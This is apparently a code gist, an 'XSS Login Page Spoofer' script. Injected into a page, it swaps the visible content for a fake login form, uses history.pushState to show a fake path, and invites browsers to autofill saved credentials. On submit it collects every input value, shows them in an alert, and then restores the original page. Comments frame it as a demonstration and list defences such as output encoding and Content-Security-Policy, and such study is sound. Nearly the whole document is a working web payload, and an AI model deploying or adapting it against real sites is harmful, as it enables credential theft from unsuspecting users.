
XSS Login Page Spoofer

login_spoof.html
<script>
// Demonstration of in-page login spoofing by script that runs inside a page's
// own origin (the gist title names XSS as the way the script gets there).
// Because the code executes in the real page, the host shown in the address
// bar stays the genuine one while the visible content is swapped out.
// Defensive takeaways: encode reflected/stored data on output so injected
// markup never executes, and serve a Content-Security-Policy without
// 'unsafe-inline' to limit where script may come from. The URL bar and TLS
// indicator do not help a user notice this kind of replacement.

// Path written into the address bar while the spoofed form is displayed
// (passed to history.pushState in the load handler below).
// NOTE(review): every variable in this script is assigned without
// var/let/const, so in non-strict code each one becomes a global.
replacement_page_url = 'index.php';
// Markup of the spoofed page, held as one string literal joined with backslash
// line continuations: two data:-URI favicon links, a title, and a POST form
// with `username` / `password` inputs that have autocomplete switched on.
// NOTE(review): presumably the field names and autocomplete='on' are chosen so
// a browser or password manager offers the credentials saved for this origin
// -- confirm against the real form of the application under test.
replacement_page_html = "\
<html>\
<head>\
<link rel='shortcut icon' href='data:image/vnd.microsoft.icon;base64,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'>\
<link rel='icon' href='data:image/vnd.microsoft.icon;base64,AAABAAEAEBAAAAAAAABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8p0/7/KdP+/ynT/v8q0/7/KdT+/yrT/v8p1P7/KtP+/ynT/v8q0/7/KdP+/yrT/v8p0/7/KtP+/wAAAP8AAAAUJLrf/ynT/v8p0/7/KdP+/yrT/v8p0/7/AAAA/wAAAP8p0/7/KtP+/ynT/v8q0/7/KdP+/yKw0/8AAAAJAAAAAAAAAP8p0/7/KdP+/yrT/v8p1P7/KtP+/xJfcv8SX3L/KdP+/yrT/v8p0/7/KtP+/ynT/v8AAAD/AAAAAAAAAAAAAAAAAQYI/ynT/v8p0/7/KtP+/ynT/v8AAAD/AAAA/ynT/v8q0/7/KdP+/yrT/v8CDQ//AAAAAAAAAAAAAAAAAAAAAAAAAP8p0/7/KtP+/ynU/v8q0/7/Jsnx/wAAAP8aiqb/KtP+/ynT/v8q0/7/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/ynT/v8q0/7/KdP+/yrT/v8p0v3/AAAA/xyTsf8p0/7/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP4q0/7/AAAA/wAAAP8p1P7/KtP+/wAAAP8AAAD/KdP+/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/xBYav8AAAD/KdP+/ynT/v8AAAD/DERS/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD0ozvf/AAAA/wAAAP8AAAD/AAAA/yrT/v8AAACpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/ynT/v8p0/7/KdP+/ynT/v8AAAD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFHCL/KdT+/ynT/v8dlbT/AAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/yrU/v8q0/7/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/BBkf/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//8AAAAAAAAAAAAAgAEAAIABAADAAwAAwAMAAOAHAADgBwAA8A8AAPgPAAD4HwAA/D8AAPw/AAD+fwAA/38AAA=='>\
<title>Password Cross-Site Scripting</title>\
</head>\
<body>\
<h2>Log Into Secret Application</h2>\
<form method='POST' action='index.php' autocomplete='on'>\
username:<input type='text' id='username' name='username' value='' autocomplete='on'><br>\
password:<input type='password' id='password' name='password' value='' autocomplete='on'><br>\
<input type='submit' name='login' value='Log In'>\
</form>\
<br>\
<br>\
come play with <a href='reflections.php'>reflections</a>\
</body>\
</html>\
"
// Everything else runs from the window load event, after document.body exists.
window.addEventListener('load',function(){
// Keep the genuine body markup and path so both can be put back after submit.
oldhtml = document.body.innerHTML
oldurl = document.location.pathname
// Swap the whole visible page for the spoofed markup.
// NOTE(review): the string is a complete document but is parsed as body
// content here; how its link/title elements take effect is browser-dependent
// -- confirm before relying on the favicon or title changing.
document.body.innerHTML = replacement_page_html
// Change the displayed URL without navigating. pushState only accepts
// same-origin URLs, so the path changes but the host cannot. Each call also
// adds a session-history entry, which is an observable side effect.
if(window.history.pushState)
window.history.pushState('','',replacement_page_url)
// Attach a submit handler to every form now in the document (after the
// replacement above, that is the spoofed form).
forms = document.querySelectorAll('form')
for(i=0;i<forms.length;i++){
forms[i].addEventListener('submit',function(e){
// Cancel the real POST and stop the event propagating to ancestor handlers.
e.preventDefault()
e.stopPropagation()
// Serialise every input element in the document as "name=value;". This
// includes the submit button as well as the username and password fields.
data = ''
inputs = document.querySelectorAll('input')
for(x=0;x<inputs.length;x++){
data += inputs[x].name + "=" + inputs[x].value + ';'
}
// The demo only displays the values, showing that page script can read
// whatever was typed or autofilled into the form.
alert(data)
// Put the original path and body markup back.
// NOTE(review): assigning innerHTML rebuilds the body from a string, so event
// listeners and element state on the original nodes are not restored; a page
// whose controls stop responding afterwards is one visible symptom.
if(window.history.pushState)
window.history.pushState('','',oldurl)
document.body.innerHTML = oldhtml
})
}
})
</script>
